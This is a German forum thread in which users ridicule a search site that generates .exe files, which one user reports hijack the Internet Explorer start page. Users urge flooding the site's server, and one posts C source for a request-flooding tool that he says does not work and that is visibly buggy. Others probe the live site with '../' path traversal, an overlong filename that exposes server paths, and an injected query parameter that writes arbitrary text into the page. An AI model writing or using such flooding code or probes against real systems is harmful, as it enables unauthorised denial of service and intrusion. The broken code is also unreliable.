Was soll das denn sein?

BF_31

kingruedi schrieb:

BF_31 schrieb:

Erstmal fällt die Adresse auf
Als zweites: Tippt mal iiirgendwas ein, diese Maschine findet immer 100% - IMMER! auch wenn man nach "fdjkfjdf8j3849j3r8jdfdsrnn3" sucht 100%!

Was sollte denn auch weniger als 100% bedeuten? Ich meine entweder findet man etwas oder nicht. Wie sollte man hier eine Prozentzahl angeben? lol

Schonmal bei heise.de gesucht?
Die suchen auch nach Prozent

Moh

ich hab mir erst mal ein paar filme runtergeladen... sogar als executable

edit: (omfg)

http://www.error-page.de/la2/exe_files/

BF_31

Anscheinend erstellen die wirklich für jeden Suchvorgang eine neue exe-Datei...
Lasst sie uns mit ihren eigenen Waffen schlagen, und Suchabfragen im Sekundentakt ausführen (am besten ein Tool dafür schreiben) Irgendwann platzt denen der Server

BF_31 schrieb:

Anscheinend erstellen die wirklich für jeden Suchvorgang eine neue exe-Datei...
Lasst sie uns mit ihren eigenen Waffen schlagen, und Suchabfragen im Sekundentakt ausführen (am besten ein Tool dafür schreiben) Irgendwann platzt denen der Server

daran hab ich auch schon gedacht, aber wahrscheinlich erstellen sie die dateien erst, wenns jemand wirklich runterlädt...

BF_31

Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

masterofx32

Die scheinen außerdem aus den Sucheingaben ohne weitere Überprüfung den Pfad durch Anhänhgen von .exe zu erstellen. Wenn man zum Beispiel "../xyz" eingibt, erhält man einen permission denied-Fehler für das übergeordnete Verzeichnis.

curry-king

Es kann ja mal einer dem Besitzer der Domain schreiben und fragen, was seine lustige Suchmaschine im Netz bezweckt. Die Daten gibt's bei denic.

Hab versucht, ein kleines Prog zu schreiben, welches Requestbombing durchführt,
hab aber keine Lust, weiter zu machen, weils nicht funktioniert! Hier der Code!

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define BUF_SIZ	4096

int send_request(const int sock, const char *hostname)
{
	char request[BUF_SIZ];
	int i;

	while (1){

	sprintf(request, "GET la2/?param=%d&search=finden%A0%21&cat=fb_loc HTTP/1.1\r\n"
		, i);

	if (send(sock, request, strlen(request), 0) == -1)
	{
		perror("send() failed");
		return 1;
	}

	}
	return 0;
}

int view_response(const int sock)
{
	char response[BUF_SIZ];
	int bytes;

	while((bytes = recv(sock, response, sizeof(response), 0)) > 0)
		fwrite(response, 1, bytes, stdout);

	if (bytes < 0)
	{
		perror("recv() failed");
		return 1;
	}

	return 0;
}

int main(int argc, char *argv[])
{
	struct hostent *host;
	struct sockaddr_in addr;
	int s;

	WSADATA wsa;
		if (WSAStartup(MAKEWORD(1, 1), &wsa))
		{
			printf("WSAStartup() failed, %lu\n", (unsigned long)GetLastError());
			return EXIT_FAILURE;
		}

	if (argc < 2)
	{
		fprintf(stderr, "usage: %s <host>\n", argv[0]);
		return 1;
	}

	s = socket(PF_INET, SOCK_STREAM, 0);
	if (s == -1)
	{
		perror("socket() failed");
		return 3;
	}

	printf("connecting to %s:80...", inet_ntoa(addr.sin_addr));
	fflush(stdout);

	addr.sin_port = htons(80);
	addr.sin_family = AF_INET;

	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
	{
		perror("connect() failed");
		return 4;
	}

	puts("ok.");

	if (send_request(s, argv[1]))
		return 5;

	if (view_response(s))
		return 6;

	return 0;
}

Hoffentlich verstosse ich damit nicht gegen das Teledienstgesetz oder was da sonst so greifen könnte.
Wenn der sich n Spass mit uns erlaubt, dürfen wir das doch auch!

Viel Spass damit!

BF_31 schrieb:

Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

BF_31

phräger schrieb:

BF_31 schrieb:

Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

Weil es sich in dem Verzeichnis befindet das Moh gepostet hat.

BF_31 schrieb:

phräger schrieb:

BF_31 schrieb:

Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

Weil es sich in dem Verzeichnis befindet das Moh gepostet hat.

autsch. das hab ich überlesen.
naja, dann waren wohl wirklich stümper am werk...

wie lang sind eigentlich die maximalen dateinamen auf einem server?

PiratMartin

Warning: copy(exe_files/DasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServer.exe): failed to open stream: File name too long in /home/www/ph2s500/html/la2/cfile.php on line 7

Warning: fopen(exe_files/DasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServer.exe): failed to open stream: File name too long in /home/www/ph2s500/html/la2/cfile.php on line 8

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 9

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fclose(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 12

Sgt. Nukem

ROFL

Das gibt's doch nicht!!

Hi!

Ich hab mal sone exe auf mein Schrottrechner gezogen.
War eigentlich nix weiter dran, aber Prlötzlich erscheint immer ein
Icon "Internet Explorer". Aber denkste. Das ist nicht der Internetexplorer,
sondern ein Link zu www.finding.de

Außerdem ändert der Internet Explorer jedes mal beim schließen seine
Sartseite, also auch auf www.finding.de

Hat jemand ne Ahnung, wie ich das wieder weg kriege?

geloescht

Wollt ihr wissen, was der Kerl als nächstes ausheckt? Ja? Dann probierts mal mit http://www.error-page.de/la3/ . Ist aber irgendwie das selbe. Habe ne Zeit lang probiert, das ganze zu hacken, hat nicht geklappt *g*
geloescht

EDIT: In der neuen Version ist es sogar möglich, ../ zu verwenden...
EDIT2: Schreibe beliebige Infos in die Antwort-Seite (also nicht die .exe): http://www.error-page.de/la3/?param=u">HIERDEINENACHRICHT&search=finden

michba

Mann, sowas geiles hab ich schon ewig nicht mehr gesehen!

War bestimmt die selbe WebAgentur, die auch die Arbeitsamtseiten damals geschrieben hat.

geloescht schrieb:

Habe ne Zeit lang probiert, das ganze zu hacken, hat nicht

Dann hast du nicht die richtigen Werkzeuge

icepacker

*rofl* das ist so geil
ich spiel grad ein bisschen mit der
vermutlich 1. version http://www.error-page.de/la/
die scheint noch verbuggter zu sein

Ps. ich seh grad man kann auch sachen uploaden..*freu*

geloescht

Die habe ich acuh schon gefunden. Allerdings geht der Upload nicht und ich finde die 3. Version besser. Da kann man nämlich auch in das darunterliegende Verzeichnis speichern.
geloescht

mal was anderes: hier im forum wird ja ab und zu gefragt, wie man dynamisch dateien an exen anhängen kann.
jetzt wissen wir auch, was die leute daraus machen...